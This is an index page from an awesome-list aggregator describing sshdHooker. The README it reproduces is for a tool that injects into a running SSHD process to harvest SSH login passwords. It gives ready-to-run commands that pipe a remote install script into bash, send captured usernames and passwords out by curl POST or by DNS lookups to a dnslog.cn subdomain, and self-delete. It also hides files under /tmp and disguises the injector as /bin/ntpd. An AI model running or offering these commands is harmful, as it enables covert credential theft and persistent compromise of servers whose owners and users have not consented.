Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/9bie/sshdHooker
One-click injection into the SSHD process to record and send the password for ssh login
https://github.com/9bie/sshdHooker
Last synced: about 1 month ago
JSON representation
One-click injection into the SSHD process to record and send the password for ssh login
- Host: GitHub
- URL: https://github.com/9bie/sshdHooker
- Owner: 9bie
- Created: 2022-07-04T05:42:51.000Z (over 2 years ago)
- Default Branch: master
- Last Pushed: 2024-03-12T07:53:06.000Z (9 months ago)
- Last Synced: 2024-08-01T22:54:35.086Z (4 months ago)
- Language: Shell
- Homepage:
- Size: 50.8 KB
- Stars: 395
- Watchers: 7
- Forks: 57
- Open Issues: 3
-
Metadata Files:
- Readme: readme.md
Awesome Lists containing this project
- awesome-hacking-lists - 9bie/sshdHooker - One-click injection into the SSHD process to record and send the password for ssh login (Shell)
README
# what's this?
SSHD injector, and then you can record passwords or do other operations.
Need to close selinux
English | [中文文档](readme_cn.md)
# how to use
## auto installer
anto installer,Only temporarily supports x64/aarch64Run:
```
bash install.sh or bash install_aarch64.sh
```Login with ssh password after running,The password record address is /tmp/.password.txt. default evil so path is /tmp/hello.so,default injector path is/tmp/.i
Other parameters:
```
-s Manually specify the sshd process id to be injected (usually it will be obtained automatically)
-e custom so file path,default is /tmp/.g.so
-o custom injector path,default is /bin/ntpd
-m change mode,defulat is 0, mode is 0 is to output to the file,output path is /tmp/.password.txt ,mode is 1 is to command execution mode
-p change payload,defsult is /tmp/.password.txt,if mode is 1,then use snsprintf to format the command and execute,Make sure the command contains both %s for format username and password
-d anto delete,If the value is anyone, any password is captured and deleted.Otherwise, it will be deleted after matching the entered username.
-l Specify the libc path. The default addressing is to find libc-xxxx.so and libc.so.x, but it does not rule out that there will be other strange libc names, so the manual specification function is added. For details, please check /proc/pid Find the libc name in /maps
```
## sampleshttp send password
```
bash install.sh -p "curl -X POST -d 'username=%s\&password=%s' --connect-timeout 1 -m 1 http://127.0.0.1" -m 1
```dns send password and self-delete (Please make sure that your command is not blocked, because the actual use of this program is that the system is an online program, if the command is blocked, it will cause the ssh login program to be blocked)
```
bash install.sh -p 'ping `echo %s-%s|xxd -ps`.k9lovy.dnslog.cn -c 1' -m 1 -d anyone
```Fast remote automatic deployment and self-delete for If any user login succeeds
```
curl -L https://github.com/9bie/sshdHooker/releases/download/1.0.4/sshdHooker.sh | bash -s -- -d anyone
```Fast remote automatic deployment and used by http send password and self-delete for If any user login succeeds (*Recommend*)
```
curl -L https://github.com/9bie/sshdHooker/releases/download/1.0.4/sshdHooker.sh | bash -s -- -p "curl -X POST -d 'username=%s\&password=%s' --connect-timeout 1 -m 1 http://127.0.0.1" -m 1 -d anyone
```## debug
use
```gcc -shared inject_got.c -ldl -fPIC -o test2.so -std=c99
mv test2.so /tmp/hello.so
gcc sshdHooker.c shellcode.s -g -o inject -ldl -lpthread
sudo ./inject sshd_pid
```# todo
- add x86/arm support
- bypass SELINUX